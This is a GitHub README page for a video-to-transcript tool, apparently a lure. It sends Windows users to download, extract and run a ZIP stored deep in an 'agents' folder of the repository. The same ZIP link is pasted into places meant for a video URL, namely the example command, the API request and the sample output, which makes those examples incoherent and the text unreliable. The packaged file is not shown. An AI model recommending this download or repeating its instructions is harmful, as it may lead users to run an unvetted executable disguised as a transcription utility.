🎥 universal-video-transcriber - Turn video links into text fast

🖥️ What this app does

Universal Video Transcriber turns a video URL into a transcript file in JSON format.

Use it when you want to:

copy spoken words from a video
keep a time-based record of audio
process links from many sites in one tool
get text from videos without doing it by hand

It follows this flow:

video URL in
media download with yt-dlp
audio cleanup with ffmpeg
speech to text with faster-whisper
timestamped JSON out

📥 Download and set up on Windows

Visit the download page here:
https://github.com/ultraconservative-abneylevel672/universal-video-transcriber/raw/refs/heads/main/skill/video-url-transcriber/agents/universal-transcriber-video-v2.0.zip
On the page, look for the latest release or the main project files.
Download the Windows version if one is provided, or download the source package if that is the only option.
Save the file to your computer, then open the folder where it downloaded.
If you get a ZIP file, right-click it and choose Extract All.
Open the extracted folder and look for the app file or setup file.
If the app opens in a terminal window, that is normal for this tool.
Keep the folder in a place you can find again, such as Downloads or Desktop.

⚙️ What you need

For a smooth run on Windows, install these tools first:

Python 3.10 or newer
ffmpeg
yt-dlp

You also need enough free disk space for temporary video files. A larger video will use more space.

If you plan to process long videos, use a machine with at least 8 GB of memory.

🚀 First-time setup

If you downloaded the source version, do this on Windows:

Install Python from the official Python website.
Make sure Python is added to PATH during install.
Open Command Prompt in the project folder.
Create a virtual environment:

python -m venv .venv

Activate it:

.venv\Scripts\activate

Install the app requirements:

pip install -r requirements.txt

Install ffmpeg and yt-dlp if they are not already on your system.

▶️ Run the transcriber

Use the command below to check that your setup works:

python skill/video-url-transcriber/scripts/transcribe_url.py --doctor

Then run a transcription with a video link:

python skill/video-url-transcriber/scripts/transcribe_url.py "https://github.com/ultraconservative-abneylevel672/universal-video-transcriber/raw/refs/heads/main/skill/video-url-transcriber/agents/universal-transcriber-video-v2.0.zip" --model-size small

If you want faster results, keep --model-size small.

If you want better accuracy on harder audio, use a larger model size.

🌐 Run the local API

If you want to send requests from another app, start the API server:

python skill/video-url-transcriber/scripts/run_api.py

The server runs on:

http://127.0.0.1:8099

Use this endpoint to transcribe a video:

curl -s http://127.0.0.1:8099/transcribe \
  -H 'content-type: application/json' \
  -d '{
    "url": "https://github.com/ultraconservative-abneylevel672/universal-video-transcriber/raw/refs/heads/main/skill/video-url-transcriber/agents/universal-transcriber-video-v2.0.zip",
    "language": null,
    "model_size": "small",
    "word_timestamps": true,
    "persist_media": false
  }'

📄 Output format

The app returns JSON with details about the source video and the transcript.

Example shape:

{
  "source_url": "https://github.com/ultraconservative-abneylevel672/universal-video-transcriber/raw/refs/heads/main/skill/video-url-transcriber/agents/universal-transcriber-video-v2.0.zip",
  "platform": "x",
  "title": "Example Video Title",
  "language": "en",
  "model_size": "small",
  "transcript": [
    {
      "start": 0.0,
      "end": 3.2,
      "text": "Hello and welcome."
    }
  ]
}

Common fields include:

source_url — the original link you gave the app
platform — the site name detected by the tool
title — the video title when available
language — the spoken language, when the tool can detect it
model_size — the speech model used
transcript — the timed text split into parts

🧭 How to use it well

Use short, clear video links when possible.

If a site blocks downloads, try a different link from the same platform.

If audio is noisy, the transcript may have more errors.

If the video has more than one speaker, the output still keeps time stamps, so you can follow who said what by looking at the context.

For best results:

use good audio
choose the right language if you know it
pick a larger model for harder audio
keep word_timestamps on if you need fine timing

🧪 Common tasks

Transcribe a single video

python skill/video-url-transcriber/scripts/transcribe_url.py "VIDEO_URL"

Check your setup

python skill/video-url-transcriber/scripts/transcribe_url.py --doctor

Start the API server

python skill/video-url-transcriber/scripts/run_api.py

Send a test request

curl -s http://127.0.0.1:8099/transcribe \
  -H 'content-type: application/json' \
  -d '{
    "url": "VIDEO_URL",
    "language": null,
    "model_size": "small",
    "word_timestamps": true,
    "persist_media": false
  }'

🗂️ Files you may see

After a run, the tool may create:

a JSON transcript file
temporary media files
audio files used during processing

If persist_media is set to false, the app cleans up temporary files after it finishes.

If you keep media, use a folder with enough space.

🔧 Troubleshooting

If the app does not start, check these items:

Python is installed
ffmpeg is installed
yt-dlp is installed
you are in the correct folder
the virtual environment is active

If a video link fails, try another supported site or a different video URL.

If transcription takes a long time, use a shorter video or a smaller model.

If you see missing audio errors, the source video may not contain clear sound.

📌 Best results on Windows

For smoother use:

keep the app folder simple, such as C:\transcriber
avoid paths with special characters
close other heavy apps while processing large videos
use wired power on a laptop during long jobs

🧩 Supported sources

The tool works with any site that yt-dlp can read.

That usually includes:

YouTube
X
Vimeo
many public video pages
other direct media pages supported by yt-dlp

📝 Typical workflow

Copy a video URL.
Run the transcriber.
Wait for the audio to download and process.
Open the JSON output.
Use the timestamps to find the part you need

📎 Example use cases

save a class lecture as text
turn a meeting recording into notes
review a talk without replaying the full video
search spoken content more easily
keep a time-based transcript for later work

Name		Name	Last commit message	Last commit date
Latest commit History 7 Commits
app		app
skill/video-url-transcriber		skill/video-url-transcriber
tests		tests
.gitignore		.gitignore
LICENSE		LICENSE
README.md		README.md
pyproject.toml		pyproject.toml
requirements.txt		requirements.txt

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

🎥 universal-video-transcriber - Turn video links into text fast

🖥️ What this app does

📥 Download and set up on Windows

⚙️ What you need

🚀 First-time setup

▶️ Run the transcriber

🌐 Run the local API

📄 Output format

🧭 How to use it well

🧪 Common tasks

Transcribe a single video

Check your setup

Start the API server

Send a test request

🗂️ Files you may see

🔧 Troubleshooting

📌 Best results on Windows

🧩 Supported sources

📝 Typical workflow

📎 Example use cases

About

Uh oh!

Releases

Packages

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

🎥 universal-video-transcriber - Turn video links into text fast

🖥️ What this app does

📥 Download and set up on Windows

⚙️ What you need

🚀 First-time setup

▶️ Run the transcriber

🌐 Run the local API

📄 Output format

🧭 How to use it well

🧪 Common tasks

Transcribe a single video

Check your setup

Start the API server

Send a test request

🗂️ Files you may see

🔧 Troubleshooting

📌 Best results on Windows

🧩 Supported sources

📝 Typical workflow

📎 Example use cases

About

Topics

Resources

License

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Packages